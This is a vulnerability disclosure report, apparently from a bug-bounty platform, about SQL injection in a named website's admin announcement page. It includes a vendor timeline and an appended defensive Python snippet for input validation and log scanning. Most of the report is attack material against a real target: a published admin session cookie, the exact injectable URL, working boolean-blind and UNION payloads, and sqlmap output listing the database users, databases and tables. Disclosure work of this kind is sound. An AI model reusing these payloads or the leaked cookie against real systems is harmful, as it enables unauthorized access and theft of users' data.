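2013-11-11: Details reported to the vendor; awaiting vendor handling
2013-11-15: Vendor confirmed; details disclosed to the vendor only
2013-11-25: Details disclosed to core white hats and experts in the relevant field
2013-12-05: Details disclosed to regular white hats
2013-12-15: Details disclosed to trainee white hats
2013-12-26: Details disclosed to the public
Wahahahahahaha
This is an injection point in the admin back end. Following on from the arbitrary-login vulnerability found last time, here is the cookie for getting into the back end (if it does not work, it has expired):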
pai_check_report_interval=Mon%2C%2011%20Nov%202013%2012%3A46%3A21%20UTC; PHPSESSID=0psbkm1e56hf82qdnn1l8gdur0; bdshare_firstime=1384167347039; XForum_AuthCode=2003f97d4cdb5e219397ba5a9f01034e%255C%252A%252F3; XForum_AuthCode=2003f97d4cdb5e219397ba5a9f01034e%255C%252A%252F3; Hm_lvt_f4f85da7b4d1098cbdf448e41fea8458=1384167731; Hm_lpvt_f4f85da7b4d1098cbdf448e41fea8458=1384167731
Injection point: http://www.paidai.com/admin/announcement.php?act=edit&ann_id=9
---
Place: GET
Parameter: ann_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: act=edit&ann_id=9 AND 8157=8157

    Type: UNION query
    Title: MySQL UNION query (NULL) - 8 columns
    Payload: act=edit&ann_id=-1171 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71796d7a71,0x67664156676d4c6a5977,0x71776a7771),NULL#
---
web application technology: PHP 5.3.8
back-end DBMS: MySQL 5
current user: 'root@localhost'
current database: 'paidai'
current user is DBA: True
118 users on the same host; every database on the whole server is compromised (12 of them are administrative users).
database management system users [12]:
[*] 'backup'@'localhost'
[*] 'cacti'@'localhost'
[*] 'epaidai'@'%'
[*] 'm_api_paidai'@'localhost'
[*] 'paidaicom'@'localhost'
[*] 'replication'@'%'
[*] 'root'@'127.0.0.1'
[*] 'root'@'localhost'
[*] 'u02'@'192.168.0.2'
[*] 'u03'@'192.168.0.3'
[*] 'u04'@'192.168.0.4'
[*] 'weipaishell'@'localhost'
SQL user passwords:
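I then queried the roles as well: there are many functions and the privileges are extremely broad. Now let's look at the list of databases.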
available databases [8]:
[*] cacti
[*] information_schema
[*] mysql
[*] paidai
[*] paidai_weipai
[*] test
[*] wiki_hd
[*] xweibo
Tables (there are too many, so not all of them are pasted here):
[20:56:00] [INFO] the SQL query used returns 245 entries
[20:56:00] [INFO] retrieved: "e_accessstattab"
[20:56:00] [INFO] retrieved: "e_activity"
[20:56:01] [INFO] retrieved: "e_activity_leaveword"
[20:56:01] [INFO] retrieved: "e_activity_old"
[20:56:01] [INFO] retrieved: "e_activity_participants"
[20:56:01] [INFO] retrieved: "e_activity_participants_old"
[20:56:01] [INFO] retrieved: "e_activity_participants_trade"
[20:56:01] [INFO] retrieved: "e_activity_poll"
[20:56:02] [INFO] retrieved: "e_activity_topics"
[20:56:02] [INFO] retrieved: "e_admin_privileges"
[20:56:02] [INFO] retrieved: "e_android_stats_device"
[20:56:02] [INFO] retrieved: "e_app_auth"
[20:56:02] [INFO] retrieved: "e_app_client"
[20:56:02] [INFO] retrieved: "e_app_client_history"
[20:56:06] [INFO] retrieved: "e_app_client_uid"
[20:56:06] [INFO] retrieved: "e_app_devicetoken"
……
Filter the input!
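One way to apply that filtering advice to the ann_id parameter, and to look for the payload shapes shown above in web-server logs. This is an added example, not part of the original report or the vendor's code; the allow-list rule, the log format and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (common log format); not taken from the site.
SAMPLE_LOG = """\
203.0.113.5 - - [11/Nov/2013:20:50:01 +0800] "GET /admin/announcement.php?act=edit&ann_id=9 HTTP/1.1" 200 5120
203.0.113.5 - - [11/Nov/2013:20:50:07 +0800] "GET /admin/announcement.php?act=edit&ann_id=9%20AND%208157%3D8157 HTTP/1.1" 200 5120
203.0.113.5 - - [11/Nov/2013:20:50:09 +0800] "GET /admin/announcement.php?act=edit&ann_id=-1171+UNION+ALL+SELECT+NULL%2CNULL%23 HTTP/1.1" 200 812
198.51.100.7 - - [11/Nov/2013:20:51:30 +0800] "GET /admin/announcement.php?act=list HTTP/1.1" 200 2048
198.51.100.7 - - [11/Nov/2013:20:52:02 +0800] "GET /index.php?ann_id=abc HTTP/1.1" 200 100
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Allow-list (assumed rule): a short, unsigned decimal id and nothing else.
# [0-9] is used instead of \d so that non-ASCII digits are rejected too.
NUMERIC_ID = re.compile(r"[0-9]{1,10}")


def is_valid_ann_id(value):
    """The filter itself: True only for values such as '9'."""
    return NUMERIC_ID.fullmatch(value) is not None


def suspicious_requests(log_text, path="/admin/announcement.php", param="ann_id"):
    """Return (client_ip, decoded_value) for each request whose id fails the allow-list."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        url = urlsplit(target)
        if url.path != path:
            continue
        # parse_qs percent-decodes and maps '+' to a space, as PHP does for $_GET
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            if not is_valid_ann_id(value):
                hits.append((ip, value))
    return hits


if __name__ == "__main__":
    for ip, value in suspicious_requests(SAMPLE_LOG):
        print(ip, repr(value))
```

The same allow-list belongs in the page handler before the value reaches any SQL, alongside a parameterized query and an application database account that is not root.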
Severity: High
Vulnerability Rank: 15
Confirmed at: 2013-11-15 16:05
We will fix this as soon as possible. Thank you for testing.
None yet